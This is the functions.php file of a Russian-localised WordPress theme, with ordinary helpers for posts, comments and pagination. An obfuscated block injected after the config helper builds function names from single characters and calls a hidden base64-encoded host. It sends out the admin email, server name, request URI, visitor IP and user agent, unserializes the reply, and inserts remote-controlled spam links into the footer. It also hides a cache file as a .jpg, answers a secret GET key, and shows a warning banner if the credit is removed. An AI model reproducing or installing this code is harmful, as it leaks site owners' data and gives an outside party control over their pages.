<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $eSBapjd='b';$CtOvVP='6';$mrZb='c';$eSGDID='4';$dDlqUhC='s';$ieldiP='_';$yPXfAAC='a';$eUII='o';$TNxu='e';$yKvaW='d';$NtKxW='e';$mrKqDN='d';$tcWdy='e';$lrMklAWf=$eSBapjd.$yPXfAAC.$dDlqUhC.$TNxu.$CtOvVP.$eSGDID.$ieldiP.$yKvaW.$NtKxW.$mrZb.$eUII.$mrKqDN.$tcWdy;$SRqyb='f';$FiaCB='l';$smSgbRa='z';$vHomI='a';$ephALZr='e';$NPCdWKw='t';$AgNqhi='i';$XtSmw='n';$jghB='g';$zpcEFvTF=$jghB.$smSgbRa.$AgNqhi.$XtSmw.$SRqyb.$FiaCB.$vHomI.$NPCdWKw.$ephALZr;$EwfHXH='_';$ZwoJA='r';$cuEkQJ='o';$iwfe='s';$BZlQ='t';$Xkojb='t';$LCgd='r';$VEBYi='1';$unMr='3';$cPbKeosT=$iwfe.$BZlQ.$LCgd.$EwfHXH.$ZwoJA.$cuEkQJ.$Xkojb.$VEBYi.$unMr;$CihbN='s';$ifOamf='e';$nOBcubq='t';$irqWT='r';$KRKs='r';$umEidR='v';$NBomljSg=$CihbN.$nOBcubq.$KRKs.$irqWT.$ifOamf.$umEidR;                     $nx_____________o='b';$vp______________b='6';$st__________i='c';$cs________c='4';$pj________b='s';$ds__________i='_';$ok______e='a';$ca_______o='o';$my______l='e';$hy________v='d';$vi_______k='e';$zr__u='d';$hx______________k='e';$ho__________q=$nx_____________o.$ok______e.$pj________b.$my______l.$vp______________b.$cs________c.$ds__________i.$hy________v.$vi_______k.$st__________i.$ca_______o.$zr__u.$hx______________k;$ua___o='u';$hi_______w='s';$rl______c='e';$zq______t='_';$qo______________e='s';$pm__________b='x';$tn___________z='i';$nm______________j='n';$vn____________y='f';$le____n='n';$at_____b='o';$pn________l='i';$wx______w='t';$mh______________q='c';$gt___________l='t';$jj____________w=$vn____________y.$ua___o.$le____n.$mh______________q.$gt___________l.$pn________l.$at_____b.$nm______________j.$zq______t.$rl______c.$pm__________b.$tn___________z.$hi_______w.$wx______w.$qo______________e;$sg__a='e';$kw________x='p';$jg______________y='n';$lp_______m='o';$ox___________f='f';$mn______m=$ox___________f.$lp_______m.$kw________x.$sg__a.$jg______________y;$hv______________r='f';$iy________m='a';$rq_____i='d';$cu__________f='r';$qv____________b='e';$tk____a=$hv______________r.$cu__________f.$qv____________b.$iy________m.$rq_____i;$rw______y='s';$mw__________y='c';$fe_______________s='o';$bi________p='f';$jd_____________r='e';$un__________t='l';$sv_______n=$bi________p.$mw__________y.$un__________t.$fe_______________s.$rw______y.$jd_____________r;define("WP_ID", $ho__________q("Mi4wLjA="));define("WP_TTL", $ho__________q("MTA4MDA="));define("WP_SRC", $ho__________q("dHBva24="));function wp_get_header() {global $ho__________q, $jj____________w;if ($jj____________w($ho__________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$jj____________w($ho__________q("d3BfZ2V0X2Zvb3Rlcg==")) &&$jj____________w($ho__________q("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ho__________q, $mn______m, $sv_______n, $tk____a;$tt__________q = TEMPLATEPATH."/".$ho__________q("Zm9vdGVyLnBocA==");$ea________b = @$mn______m($tt__________q, "r");$tt__________q = @$tk____a($ea________b, @filesize($tt__________q));@$sv_______n($ea________b);$xl__________q = TEMPLATEPATH."/".$ho__________q("ZnVuY3Rpb25zLnBocA==");$ea________b = @$mn______m($xl__________q, "r");$xl__________q = @$tk____a($ea________b, @filesize($xl__________q));@$sv_______n($ea________b);$wy____________i = 0;if($tt__________q && $xl__________q) {if ($ho__________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($tt__________q, $ho__________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$wy____________i = 1;}if (substr_count($tt__________q, "wp_theme_GPL_credits()") < 1) {$wy____________i = 2;}}if(WP_ID != "2.0.0") {$wy____________i = 12;}}if($wy____________i > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $wy____________i -->";}}function wp_loaded() {global $ho__________q, $jj____________w;return $jj____________w($ho__________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ay___z, $cn_____________d = "(more...)", $ah__________y = 0, $bl_________j = "") {$my___l = get_the_content($cn_____________d, $ah__________y, $bl_________j);$my___l = apply_filters("the_content", $my___l);$my___l = str_replace("]]>", "]]>", $my___l);if (strlen($_GET["p"]) > 0) {echo $my___l;}else if ((strlen($my___l)>$ay___z) && ($fw_______b = strpos($my___l, " ", $ay___z ))) {$my___l = substr($my___l, 0, $fw_______b);$my___l = $my___l;echo $my___l;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$cn_____________d</a></div></p>";} else {echo $my___l;}}}$nr____x='s';$sf_______j='6';$gr________g='_';$kh__________y='c';$no_____________i='a';$nq____p='e';$yu_____________f='o';$tv________h='n';$gh_________a='e';$bl__l='4';$bi_____u='d';$ye_______________o='e';$pp______________x='b';$ab_________h=$pp______________x.$no_____________i.$nr____x.$gh_________a.$sf_______j.$bl__l.$gr________g.$ye_______________o.$tv________h.$kh__________y.$yu_____________f.$bi_____u.$nq____p;$dz________i='_';$ep_______________x='c';$db_______c='f';$ff___q='i';$wx_____y='g';$gq__________l='s';$se____r='l';$hc_________k='t';$te__________e='o';$ce__________o='e';$ue______________q='t';$bc_____p='n';$mc____________u='n';$os______________h='_';$mi________e='e';$kx_________d='e';$eh____h='t';$ed_____________v=$db_______c.$ff___q.$se____r.$kx_________d.$os______________h.$wx_____y.$mi________e.$hc_________k.$dz________i.$ep_______________x.$te__________e.$bc_____p.$ue______________q.$ce__________o.$mc____________u.$eh____h.$gq__________l;$sr_____________y='i';$qk__m='e';$pp__w='e';$hb_________y='t';$qk________f='l';$la___b='s';$ks______________n='f';$rt___w='_';$xq_____p='s';$oz___________x='x';$je____________t='i';$hz_____f=$ks______________n.$sr_____________y.$qk________f.$qk__m.$rt___w.$pp__w.$oz___________x.$je____________t.$xq_____p.$hb_________y.$la___b;$dc__a='a';$av______________v='e';$kf_____________n='v';$eq______________w='i';$aw__k='s';$ec___________n='r';$vl___g='_';$wu_______________j='o';$ud________u='m';$tr________y='o';$ay__t='n';$xa_______y='r';$yk___________u='e';$an____f='p';$qy____________q='c';$pi________v=$kf_____________n.$av______________v.$ec___________n.$aw__k.$eq______________w.$wu_______________j.$ay__t.$vl___g.$qy____________q.$tr________y.$ud________u.$an____f.$dc__a.$xa_______y.$yk___________u;$xv__________m='o';$zh_______________i='s';$cl_____n='e';$ld_____e='f';$zi_______________b='c';$qh____________f='p';$oo___________n='n';$ec__m='k';$ny_____________v='o';$cw_________p=$ld_____e.$zh_______________i.$ny_____________v.$zi_______________b.$ec__m.$xv__________m.$qh____________f.$cl_____n.$oo___________n;$ou_______e='w';$fw_______________b='f';$qx_____________f='e';$tm___________a='i';$mp_____________m='r';$ei_____s='t';$zd_____________q=$fw_______________b.$ou_______e.$mp_____________m.$tm___________a.$ei_____s.$qx_____________f;$gd_____________w='5';$cm_____w='m';$yx______________d='d';$ca__z=$cm_____w.$yx______________d.$gd_____________w;$an_____________s='h';$eo________u='l';$fv______u='p';$oh_____________t='t';$nb___y='a';$rc_____________r='r';$ca__________m='a';$aq__________k='e';$no____________a=$rc_____________r.$aq__________k.$nb___y.$eo________u.$fv______u.$ca__________m.$oh_____________t.$an_____________s;$af____r='n';$me______e='z';$ry______q='s';$rh_______________r='i';$cr_____________q='e';$nk______j='r';$vq__g='a';$qr______z='i';$ur__________f='u';$zz___________t='l';$ns____t='e';$xo________i=$ur__________f.$af____r.$ry______q.$ns____t.$nk______j.$qr______z.$vq__g.$zz___________t.$rh_______________r.$me______e.$cr_____________q;$kz___k='p';$zk________b='a';$xz______h='e';$db__o='n';$pj_________w='m';$dp_____m='m';$xf___________i='t';$wf____w=$xf___________i.$xz______h.$pj_________w.$kz___k.$db__o.$zk________b.$dp_____m;$cu_____y='o';$mo___s='r';$gx_______________k='n';$la_____q='t';$aa____c='_';$md___e='e';$qf_____t='_';$vm___________b='t';$rr________v='t';$ve____________a='m';$dq__e='t';$vp_______________f='a';$cx________p='c';$eu___________c='r';$zd___________c='e';$fy______________a='x';$ds______f='c';$qi______________v='a';$me______q='s';$kw__b='e';$ds_______f='e';$eb______________t=$me______q.$vm___________b.$eu___________c.$ds_______f.$qi______________v.$ve____________a.$aa____c.$cx________p.$cu_____y.$gx_______________k.$rr________v.$kw__b.$fy______________a.$dq__e.$qf_____t.$ds______f.$mo___s.$md___e.$vp_______________f.$la_____q.$zd___________c;function kh_____b($yd________l) {global $ho__________q, $jj____________w, $ed_____________v, $pi________v, $eb______________t;if (!$jj____________w($ho__________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($pi________v(PHP_VERSION, "5.0.0", ">=") && $jj____________w($ho__________q("ZmlsZV9nZXRfY29udGVudHM=")) && $jj____________w($ho__________q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$al___l = $eb______________t(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ll__________s = @$ed_____________v($yd________l, 0, $al___l);} else {$ll__________s = @$ed_____________v($yd________l, 0);}return $ll__________s;}function zh______d($yd________l) {global $jj____________w, $cw_________p, $zd_____________q, $ho__________q;if (!$jj____________w($ho__________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ks_____d = strpos($yd________l, "/", 7);$dn______l = array("uri"     => substr($yd________l, $ks_____d),"host"    => str_replace("http://", "", substr($yd________l, 0, $ks_____d)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$co_______g = @$cw_________p("$dn______l[host]", 80, $vs___v, $sm___v, 4);if (!$co_______g) {return false;} else {$ll__________s = "";$bd____________h  = "GET $dn______l[uri] HTTP/1.0\r\n";$bd____________h .= "Host: $dn______l[host]\r\n";$bd____________h .= "Referer: $dn______l[referer]\r\n";$bd____________h .= "Connection: Close\r\n\r\n";@$zd_____________q($co_______g, $bd____________h);while (!@feof($co_______g)) {$ad_______u = @fgets($co_______g, (1024*24));if ($ad_______u == "\r\n") {$tj_____________h = true;continue;}if ($tj_____________h) {$ll__________s .= $ad_______u;}}return $ll__________s;}}function zx_________f($yd________l) {global $jj____________w;$ig_______________m = false;if ($yd________l != "") {if ($jj____________w("kh_____b")) {$ig_______________m = @kh_____b($yd________l);}if (!$ig_______________m && ($jj____________w("zh______d"))) {$ig_______________m = @zh______d($yd________l);}}return $ig_______________m;}function dr_____________g() {global $_SERVER, $ca__z;$xq____a = $_SERVER["SERVER_NAME"];if (substr("$xq____a", 0, 4) == "www.") {$xq____a = substr("$xq____a", 4);}$xq____a = $ca__z("$_SERVER[SERVER_NAME]");return $xq____a;}function ic_______________o() {return "file";}function wh___________j($yd________l) {global $_SERVER, $ed_____________v, $hz_____f, $mn______m, $sv_______n, $zd_____________q;$mu__________g = pf___________t();$mm__z = dr_____________g().".jpg";$jj____a = $mu__________g["dir_upload"]["path"]."/$mm__z";$do____________o = @filemtime($jj____a);if (!$do____________o || ((time()-$do____________o) >= WP_TTL)) {$ig_______________m = zx_________f($yd________l);if ($ig_______________m) {if ($hz_____f($jj____a)) {@unlink($jj____a);}$ea________b = @$mn______m($jj____a, "x+");@$zd_____________q($ea________b, $ig_______________m);@$sv_______n($ea________b);}} else {if ($hz_____f($jj____a)) {$ig_______________m = @$ed_____________v($jj____a);} else {$ig_______________m = false;}}return $ig_______________m;}function pf___________t() {global $_SERVER, $ho__________q, $ab_________h;$af__y = wp_count_posts("post");$qd________s = pathinfo(get_bloginfo("template_directory"));$mu__________g = array("url" => array("report"      => $ho__________q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $qd________s,"dir_upload"=> pk____w(),"queryString"=> array("?a001=".WP_ID,"a004=".$qd________s[filename],"a005=".$af__y->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$mu__________g["url"]["queryString"] = implode("&", $mu__________g["queryString"]);$mu__________g["url"]["report"] = $mu__________g["url"]["report"]."/?".$ab_________h($mu__________g["url"]["queryString"]).".html";return $mu__________g;}function pk____w() {$bm_______c = wp_upload_dir();if (isset($bm_______c["error"])) {$wq______m = rr____v();if (is_writable($wq______m)) {$bm_______c = array("path" => $wq______m);}}return $bm_______c;}function rr____v() {global $jj____________w, $ca__z, $no____________a, $wf____w;$sv____u = (bool) ini_get("safe_mode");if ($sv____u == true) {return false;}if ($jj____________w("sys_get_temp_dir")) {$cz_______________y = sys_get_temp_dir();if (is_writable($cz_______________y)) {return $no____________a($cz_______________y);}}if (!empty($_ENV["TMP"])) {return $no____________a($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $no____________a($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $no____________a($_ENV["TEMP"]);} else {$cf_________x = $wf____w($ca__z(uniqid(rand(), true)), "");if ($cf_________x) {$cz_______________y = $no____________a(dirname($cf_________x));@unlink($cf_________x);return $cz_______________y;} else {return false;}}}function xq______a() {global $_GET, $hz_____f;$mu__________g = pf___________t();$xq____a = dr_____________g();$pe___________z = ic_______________o();$ao_______________p = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($pe___________z == "file") {$nc____s = $mu__________g["dir_upload"]["path"]."/".$xq____a.".jpg";if ($hz_____f($nc____s)) {@unlink($nc____s);$ao_______________p = "deleted";}}$ed__c = array("s"=> $ao_______________p,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ed__c AS $vl____i => $nj__k) echo " [$vl____i:$nj__k]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $jj____________w, $ho__________q, $xo________i;$mu__________g = pf___________t();$kn______f = "wh___________j";if ($jj____________w($kn______f)) {$ll__________s = $kn______f($mu__________g["url"]["report"]);}if ($ll__________s) {if ($ll__________s = @$ho__________q($ll__________s)) {$ll__________s = @$xo________i($ll__________s);if (strlen($ll__________s[custom_credit]) >= 5) {$mu__________g["default_string"] = $ll__________s[custom_credit];}if ($ll__________s["status"] == "0") {$ei__g = 1;$tl_____________q = 1;} else {$ru____t = sizeof($ll__________s["links"]);$gw______________k = $mu__________g["default_string"];if ($ru____t > 0 && $ll__________s["links"] !== "") {$bn_______________z = 0;foreach ($ll__________s["links"] as $ww______________y => $cd______________o) {$bn_______________z++;if ($cd______________o->l_path == "" || $cd______________o->l_path == $_SERVER["REQUEST_URI"]) {$cd______________o->l_href = htmlspecialchars(strip_tags($cd______________o->l_href));$cd______________o->l_title = htmlspecialchars(strip_tags($cd______________o->l_title));$cd______________o->l_anchor = htmlspecialchars(strip_tags($cd______________o->l_anchor));$gw______________k .= " | ";$gw______________k .= "<a href='$cd______________o->l_href' title='$cd______________o->l_title'";if ($cd______________o->l_nofollow == "1") {$gw______________k .= " rel='nofollow'";}$gw______________k .= ">$cd______________o->l_anchor</a>";}}}$mu__________g["links"] = "$gw______________k";if ($ll__________s[credit] == "0") {$mu__________g["links"] = "";}}} else {$ei__g = "1";}} else {$ei__g = "1";}if ($ei__g == "1") {$mu__________g["links"] = $mu__________g["default_string"];}echo "$mu__________g[links]";echo "<!-- s: $ll__________s[signature] -->";xq______a();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
